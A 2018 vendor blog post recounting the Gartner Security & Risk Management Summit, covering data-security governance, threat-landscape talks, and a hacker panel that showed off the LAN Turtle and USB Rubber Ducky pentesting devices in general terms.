Gartner Security & Risk Management Summit 2018 Trip Report June 19, 2018 Charles Goldberg | Senior Director, Marketing More About This Author > Every June, Gartner hosts a terrific security conference near Washington, D.C. called Gartner Security & Risk Management Summit. This event is focused on the needs of senior IT and security professionals, such as CISOs, chief risk officers, architects, IAM and network security leaders. This year, there were over 3,000 attendees, 120 analyst sessions to choose from, and 200 vendors that were on the show floor and delivering presentations. It is a big show, but I wanted to share with you one specific observation that I made about this year’s conference, and a few of the more interesting things I learned from the hackers. I have been attending this conference for many years and there is always a lot emphasis on what’s new (and the hottest buzz words). I was just reviewing last year’s trip report and thinking about how it was full of “IoT”, “Blockchain”, and of course “Digital Transformation”. This year, I felt like there was more emphasis on getting back to the basics. Not to say that there weren’t sessions on these important topics—but these hot security topics were weaved into more general best practices sessions. Just to double check that my perception wasn’t false, I just did a search on “IoT” and only two Gartner sessions had that term in the title. “Blockchain” had five sessions—but it is a really hot security topic and I’m pretty sure it is less than last year, however, “Digital Transformation” only had one analyst session (but a lot of vendor sessions). I know you’re thinking, what about “GDPR”? That buzz word is a very big deal in the industry now and was a hot topic throughout the event as well. Back to basics Many of the analysts spoke about the ever-increasing value of data. Gartner Research Director Brian Lowans called “data the new oil” and spent his session, “The State of Data Security” describing how important it is to set up a governance structure and to have organizations working together in order to identify, classify and strategically approach protecting data. Several of the analysts used the same chart (see below) to show that security solutions are beginning to hit a steady state for limiting insider threats and accidental disclosure, as the success of hackers continues to grow unabated. Another example of back to the basics was how Gartner Research Directors Gorka Sadowski and Pete Shoard took us through the State of the Threat Landscape, 2018 (see chart below). It wasn’t just a depressing litany of new attack vectors, script kiddie tools and Korean hacker nightmare scenarios, but a very sensible approach of controlling risk. They looked at “risk” through analogies, and spoke about what can be controlled and what can’t. By focusing on what we can control we can limit our risks. Their examples liken to protecting from Lyme disease and the big bad wolf blowing down our piggy homes. We usually can’t prevent the threat, however, we can be very proactive on putting in good foundational practices to limit our exposure to known vulnerabilities –giving our business a strategy that “allows a prioritized approach to dealing with risks and hence, vulnerabilities”. This was a theme that was continued throughout the week. An example they shared was timely, “the Inclusion of malware in organization code via malware injection in code library”. They shared examples of how this occurs on GitHub. They also talked about the difficult methods of protecting yourself (never using open source code versus changing process and checking the MD5 hash before putting the code in use). We all know code signing is an easy and valuable way to limit exposure, but it has to be enforced either by process or technology. The real fun and interesting stories came from the hackers! Gartner gave us two opportunities to see the world from the hacker’s perspective. The first was a key note from Keren Elazari. She gave us an inspiring keynote called “Innovation Lessons We Can Learn From Hackers”. She reminded us that being a “Hacker” isn’t a bad thing. Hackers are a group of people with a deep curiosity of how things work, how they can be made better, and they have high levels of creativity. She recommended working with white hat hackers, look and support those with hacker tendencies in our organizations and create incentives to promote positive hacker behaviors, and to attend meetups and conferences to develop these skills. It was a fantastic, fun and fast-paced presentation and I highly recommend that you watch her TED talk. Later that afternoon, two other hackers, Jesse Krembs and Rob Fuller joined Keren on an interesting panel discussion. This was a clever group that liked to razz each other a bit. They discussed hacker mentality, Def Con and other hacker events, as well as a few tricks of the trade. Two gizmos they showed off were amazing. The first, was the LAN Turtle. This $60 device opens 3G out-of-band access, behind the firewall, for the owner. White hat hackers can put this unit in a docking station, so that it stays powered even after the laptop is removed, and they can be “on the network” to test if the SecOps team can find the malware (which isn’t residing on a known machine). You can imagine how great this would be for testing… or just to get around perimeter security like firewalls and VPNs. Another takeaway from the conference…What device does every USB port allow? The keyboard of course! I had read about how to make USB Rubber Ducky devices in the past, but now I know how easy it is to buy one. I actually see units for under $10 on the web. This device can be used by “Pen testers” to automate running scripts on computers by allowing it to run scripts and type 1,000 characters/second by simply plugging in this USB “keyboard”. Since it looks like a standard keyboard, there is no need to worry about security or driver problems making it difficult “to run the tests”. What else can it be used for? I’ll leave that up to your imagination. I started this blog with how insider threat events are leveling, while hacking events continue to accelerate. Using these hacker tools, the outsider immediately becomes the insider by passing through all the layers of perimeter security. This leaves data that isn’t protected with encryption and strong access controls as vulnerable as sitting ducks. I could keep this blog going—but I will spare you. I hope to see you at Gartner SRM next year! Until than—keep your data safe! Feel free to leave a comment below or follow Thales eSecurity on Twitter, LinkedIn, and Facebook.